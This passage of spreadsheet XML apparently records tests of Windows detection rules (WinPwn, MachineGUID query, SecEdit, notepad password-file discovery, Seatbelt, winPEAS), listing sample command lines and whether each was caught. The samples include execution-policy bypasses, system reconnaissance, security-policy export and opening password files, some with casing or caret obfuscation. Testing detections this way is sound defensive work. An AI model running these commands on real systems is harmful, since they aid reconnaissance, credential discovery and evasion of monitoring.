      <c r="F987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H987" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I987" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J987" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K987" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="988" ht="15.75" customHeight="1" s="42">
      <c r="A988" s="43" t="n"/>
      <c r="B988" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C988" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D988" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E988" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F988" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G988" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H988" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I988" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J988" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K988" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="989" ht="15.75" customHeight="1" s="42">
      <c r="A989" s="43" t="n"/>
      <c r="B989" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C989" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D989" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E989" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H989" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I989" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J989" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K989" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="990" ht="15.75" customHeight="1" s="42">
      <c r="A990" s="43" t="n"/>
      <c r="B990" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C990" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D990" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E990" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H990" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I990" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J990" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K990" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="991" ht="15.75" customHeight="1" s="42">
      <c r="A991" s="43" t="n"/>
      <c r="B991" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_domain_discovery</t>
        </is>
      </c>
      <c r="C991" s="36" t="inlineStr">
        <is>
          <t>Network Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D991" s="36" t="inlineStr">
        <is>
          <t>e6313acd-208c-44fc-a0ff-db85d572e90e</t>
        </is>
      </c>
      <c r="E991" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c nslookup -type=MX example.com</t>
        </is>
      </c>
      <c r="F991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I991" s="43" t="n"/>
      <c r="J991" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K991" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="992" ht="15.75" customHeight="1" s="42">
      <c r="A992" s="43" t="n"/>
      <c r="B992" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C992" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D992" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E992" s="36" t="inlineStr">
        <is>
          <t>cmd /c reg query "HKLM\SOFTWARE\Microsoft\Cryptography"</t>
        </is>
      </c>
      <c r="F992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I992" s="43" t="n"/>
      <c r="J992" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K992" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="993" ht="15.75" customHeight="1" s="42">
      <c r="A993" s="43" t="n"/>
      <c r="B993" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C993" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D993" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E993" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I993" s="43" t="n"/>
      <c r="J993" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K993" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="994" ht="15.75" customHeight="1" s="42">
      <c r="A994" s="43" t="n"/>
      <c r="B994" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C994" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D994" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E994" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I994" s="43" t="n"/>
      <c r="J994" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K994" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="995" ht="15.75" customHeight="1" s="42">
      <c r="A995" s="36" t="n"/>
      <c r="B995" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C995" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D995" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E995" s="36" t="inlineStr">
        <is>
          <t>powershell -NoprOFile -c "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I995" s="43" t="n"/>
      <c r="J995" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K995" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="996" ht="15.75" customHeight="1" s="42">
      <c r="A996" s="36" t="n"/>
      <c r="B996" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C996" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D996" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E996" s="36" t="inlineStr">
        <is>
          <t>powershell -noprOFiLe -c "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I996" s="43" t="n"/>
      <c r="J996" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K996" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="997" ht="15.75" customHeight="1" s="42">
      <c r="A997" s="36" t="n"/>
      <c r="B997" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C997" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D997" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E997" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I997" s="43" t="n"/>
      <c r="J997" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K997" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="998" ht="15.75" customHeight="1" s="42">
      <c r="A998" s="36" t="n"/>
      <c r="B998" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C998" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D998" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E998" s="36" t="inlineStr">
        <is>
          <t>powershell -noProFILe -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I998" s="43" t="n"/>
      <c r="J998" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K998" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="999" ht="15.75" customHeight="1" s="42">
      <c r="A999" s="36" t="n"/>
      <c r="B999" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C999" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D999" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E999" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I999" s="43" t="n"/>
      <c r="J999" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K999" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1000" ht="15.75" customHeight="1" s="42">
      <c r="A1000" s="36" t="n"/>
      <c r="B1000" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1000" s="36" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1000" s="36" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1000" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -cOmmAnd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1000" s="43" t="n"/>
      <c r="J1000" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1000" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1001" ht="15.75" customHeight="1" s="42">
      <c r="A1001" s="43" t="n"/>
      <c r="B1001" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1001" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1001" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1001" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -COMMaND "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1001" s="43" t="n"/>
      <c r="J1001" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1001" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1002" ht="15.75" customHeight="1" s="42">
      <c r="A1002" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1002" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1002" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1002" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1002" s="36" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1002" s="36" t="n"/>
      <c r="J1002" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1002" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1003" ht="15.75" customHeight="1" s="42">
      <c r="A1003" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1003" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1003" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1003" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1003" s="36" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" /db mytemplate.db</t>
        </is>
      </c>
      <c r="F1003" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1003" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1003" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1003" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1003" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1003" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1004" ht="15.75" customHeight="1" s="42">
      <c r="A1004" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1004" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1004" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1004" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1004" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /exp^ort /areas SECURITYPOLICY /cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1004" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1004" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1004" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1004" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1004" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1004" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1005" ht="15.75" customHeight="1" s="42">
      <c r="A1005" s="43" t="n"/>
      <c r="B1005" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_system_info_uncommon</t>
        </is>
      </c>
      <c r="C1005" s="36" t="inlineStr">
        <is>
          <t>Uncommon System Information Discovery Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1005" s="36" t="inlineStr">
        <is>
          <t>9d5a1274-922a-49d0-87f3-8c653483b909</t>
        </is>
      </c>
      <c r="E1005" s="36" t="inlineStr">
        <is>
          <t>for /f "tokens=*" %a in ('wmic logicaldisk get name^,size^,freespace ^| findstr [A-Z]') do @echo %a</t>
        </is>
      </c>
      <c r="F1005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1005" s="43" t="n"/>
      <c r="J1005" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1005" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1006" ht="15.75" customHeight="1" s="42">
      <c r="A1006" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1006" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1006" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1006" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1006" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\notepad.exe "C:\Data\passwords.csv"</t>
        </is>
      </c>
      <c r="F1006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1006" s="43" t="n"/>
      <c r="J1006" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1006" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1007" ht="15.75" customHeight="1" s="42">
      <c r="A1007" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1007" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1007" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1007" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1007" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c notepad.exe C:\Users\admin\Documents\passwords.txt</t>
        </is>
      </c>
      <c r="F1007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1007" s="43" t="n"/>
      <c r="J1007" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1007" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1008" ht="15.75" customHeight="1" s="42">
      <c r="A1008" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1008" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1008" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1008" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1008" s="36" t="inlineStr">
        <is>
          <t>notepad.exe C:\secure\passwords.bak</t>
        </is>
      </c>
      <c r="F1008" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1008" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1008" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1008" s="36" t="n"/>
      <c r="J1008" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1008" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1009" ht="15.75" customHeight="1" s="42">
      <c r="A1009" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1009" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1009" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1009" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1009" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1009" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1009" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1009" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1009" s="36" t="n"/>
      <c r="J1009" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1009" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1010" ht="15.75" customHeight="1" s="42">
      <c r="A1010" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1010" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1010" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1010" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1010" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1010" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1010" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1010" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1010" s="36" t="n"/>
      <c r="J1010" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1010" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1011" ht="15.75" customHeight="1" s="42">
      <c r="A1011" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1011" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1011" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1011" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1011" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaNd "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1011" s="43" t="n"/>
      <c r="J1011" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1011" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1012" ht="15.75" customHeight="1" s="42">
      <c r="A1012" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1012" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1012" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1012" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1012" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1012" s="43" t="n"/>
      <c r="J1012" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1012" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1013" ht="15.75" customHeight="1" s="42">
      <c r="A1013" s="43" t="n"/>
      <c r="B1013" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1013" s="36" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1013" s="36" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
      <c r="E1013" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Data\Seatbelt.dll,main FullDFIR</t>
        </is>
      </c>
      <c r="F1013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1013" s="43" t="n"/>
      <c r="J1013" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1013" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1014" ht="15.75" customHeight="1" s="42">
      <c r="A1014" s="43" t="n"/>
      <c r="B1014" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1014" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1014" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1014" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F1014" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1014" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1014" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1014" s="43" t="n"/>
      <c r="J1014" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1014" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1015" ht="15.75" customHeight="1" s="42">
      <c r="A1015" s="43" t="n"/>
      <c r="B1015" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1015" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1015" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1015" s="36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015" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1015" s="36" t="b">
        <v>1</v>
      </c>
